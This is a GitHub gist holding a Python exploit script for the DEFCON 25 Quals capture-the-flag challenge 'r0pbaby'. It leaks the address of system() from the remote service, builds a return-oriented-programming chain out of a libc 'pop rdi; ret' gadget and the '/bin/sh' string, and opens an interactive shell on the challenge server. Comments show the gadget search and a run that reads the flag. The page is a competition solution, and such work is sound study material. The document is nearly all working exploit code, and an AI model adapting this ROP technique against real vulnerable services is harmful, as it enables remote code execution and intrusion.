Skip to content

Instantly share code, notes, and snippets.

@ytn86 ytn86/exploit.py
Last active Aug 29, 2015

Embed
What would you like to do?
DEFCON 25 Quals r0pbaby
#!/usr/bin/env python3
import struct
import sys
import telnetlib
HOST = 'r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me'
PORT = 10436
"""
% strings -tx libc-2.19_15.so|grep "/bin/sh"
17ccdb /bin/sh
% rp --file=libc-2.19_15.so --rop=1 --unique|grep "pop rdi"
0x000fa47a: pop rdi ; call rax ; (1 found)
0x000831a8: pop rdi ; jmp rax ; (2 found)
0x00103fe2: pop rdi ; rep ret ; (2 found)
0x00022b1a: pop rdi ; ret ; (506 found)
0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
"""
binsh_offset = 0x17ccdb
system_offset = 0x46640
popret_offset = 0x22b1a
def rp(addr):
addr = struct.pack('<Q', addr)
return addr
def get_addr(tn, name):
tn.write(b'2\n' + name.encode() + b'\n')
tn.read_until(name.encode() + b': ')
buf = tn.read_until(b'\n')
addr = int(buf.decode(), 16)
print(name + ' :{0}'.format(hex(addr)))
return addr
def exploit():
tn = telnetlib.Telnet(HOST, PORT)
system = get_addr(tn, 'system')
payload = b'deadbeef'
payload += rp(system - (system_offset - popret_offset))
payload += rp(system - (system_offset - binsh_offset))
payload += rp(system)
payload += b'\n'
tn.write(b'3\n')
tn.write(b'32\n')
tn.write(payload)
tn.interact()
def main():
exploit()
if __name__ == '__main__':
main()
"""
% python exploit.py
system :0x7f6066881640
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
cat /home/r0pbaby/flag
The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.